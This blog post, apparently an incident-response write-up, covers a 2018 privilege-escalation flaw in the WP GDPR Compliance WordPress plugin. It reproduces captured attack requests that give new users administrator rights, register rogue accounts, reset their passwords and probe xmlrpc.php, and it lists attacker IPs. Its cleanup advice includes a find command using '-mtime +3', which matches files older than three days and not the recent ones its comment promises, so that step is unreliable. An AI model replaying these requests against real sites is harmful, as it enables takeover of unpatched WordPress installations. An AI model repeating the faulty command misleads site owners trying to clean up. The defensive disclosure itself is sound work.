WordPress WP GDPR Compliance Privilege Escalation Exploit

Published on Author gryzliLeave a comment

Two days ago (on November 08 2018) nasty WP exploit has been identified inside the popular GDPR wordpress plugin , that leads to privilege escalation. 

The plugin has more than 100 000 active installations. 

All versions prior 1.4.3 (except 1.4.3) are vulnerable to the exploit. 

 

What is the actual vulnerability ? 

More information about the vulnerability itself could be found here: 

https://wpvulndb.com/vulnerabilities/9144

WordFence

 

How To Identify the attack ? 

The actual attack happens in a several stages. 

 

First attackers are trying to enable site registrations and set the default permissions for new users to be ‘Administrator’ 

 

This is done by POST request to your wp-admin/admin-ajax.php 

The request looks like this (This is a real malicious request): 

Host:XXXXXX.COM

Accept-Encoding:gzip

Content-Length:188

Content-Type:application/x-www-form-urlencoded

Referer:http://XXXXXX.COM/wp-login.php?action=rp User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

BODY: action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4

 

Second attackers are trying to register a new user 

Most of the attacks in the wild are trying to register with the following 2 users: 

t2trollherten

t3trollherten

 

Real post request looks like this: 

Request_URI: http://XXXXXX.COM/wp-login.php?action=register

BODY:

redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register

 

Third (Optional) Trying to reset username password

We have seen some tries of attackers to reset the malicious user password. 

 

The request looks like this: 

Cookie: wordpress_test_cookie=WP+Cookie+check; path=/;wp-resetpass-464755d4cc9c2c0d7cc2b015eb2b7c0a=t2trollherten%3A76cnn4sryixU82wtCG9j; path=/wp-login.php; httponly;

URI: /wp-login.php?action=resetpass

BODY:

pass1=0rt8Ka7slborUi&pass1-text=0rt8Ka7slborUi&pass2=0rt8Ka7slborUi&rp_key=76cnn4sryixU82wtCG9j&wp-submit=Reset%2BPassword

 

At this moment the attacker will already have administrator user created. 

 

What malicious actions attackers are making after exploiting the website ?

Different approaches have been reported, but most of the damage includes: 

  • Adding malicious administrator users to database 
  • Breaking websites by changing the “site_url” inside WP settings ,for doing black hat seo 
  • Adding malicious cronjobs 
  • Infecting currently existing files with shells
  • Uploads of new web shells in the website document root
  • Adding crontab crons , that reinfect the account 
  • Installing malicious wp plugins

Basically at this stage (when the attacker has access to the account), they could do all kind of harms. 

 

How to clean the website after successful exploitation ?

!!! Before making any recovery on your website, make sure you have updated WP GDPR Compliance to it’s latest fixed version – 1.4.3 !!!

1) Restore everything from recent backup

This is the most effective action you could take to clean out your WP site. 

We have traces of the attack starting from 08 of November, so it would be best if you are able to restore your wordpress files + database from date before 08 of November

In case you don’t have any backup, you can try with some of the next cures.

 

2) Search for newly added users in your database and remove them 

Inside your db->wp_users table , you could search for newly created users. 

During now, we have seen the following 2 users to be actively injected in the database: 

----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
| 20 | t2trollherten | $P$ByTG6qJi/eGVCRB2i.n/wS80Y967ng/ | t2trollherten | trollherten@mail.com | | 2018-11-08 13:43:38 | | 0 | t2trollherten |
| 21 | t3trollherten | $P$Bb7f2NV78UD2/nNpB6aKCStQnit99l1 | t3trollherten | t3trollherten@bk.ru | | 2018-11-08 15:58:44 | | 0 | t3trollherten |
+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+

 

Update: 

Another user that has been reported by Sucuri is “superuser” as as malicious one inserted into the database.

3) Search for newly created files in your hosting account 

If you have multiple sites residing in the same account, you better search the whole account instead just your hacked website directory. 

You could try searching with find for files added in the last few days: 

# This will search for files modified in the last 3 days.

find . -type f -mtime +3 

 

4) Revise your installed wordpress plugins for suspicious ones and delete them 

Check if you have any suspicous newly installed WP plugins and remove them . 

 

5) Check your system user cronjobs for suspicious ones

 

 

IP Addresses doing exploitation in the wild 

Until know we have seen the following IP addresses exploiting the vulnerability in the wild: 

109.234.39.250
109.234.37.214

46.39.65.176
195.123.213.91

 

UPDATE (13 Nov 2018)

Right now we are seeing a big wave of /xmlrpc.php requests ,that are trying to guess the passwords for the malicious users. 

Attackers are trying to get control over already infected websites. 

The requests looks like this: 

URI: /xmlrpc.php

BODY

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getProfile</methodName>
<params>
<param><value>9999</value></param>
<param><value>t2trollherten</value></param>
<param><value>0rt8Ka7slborUi</value></param>
</params>
</methodCall>

Useful external resources

https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-with-wp-gdpr-compliance-plugin-vulnerability.html

https://wordpress.org/support/topic/important-update-to-1-4-3-immediately/

 

WordFence Report

Leave a Reply

Your email address will not be published. Required fields are marked *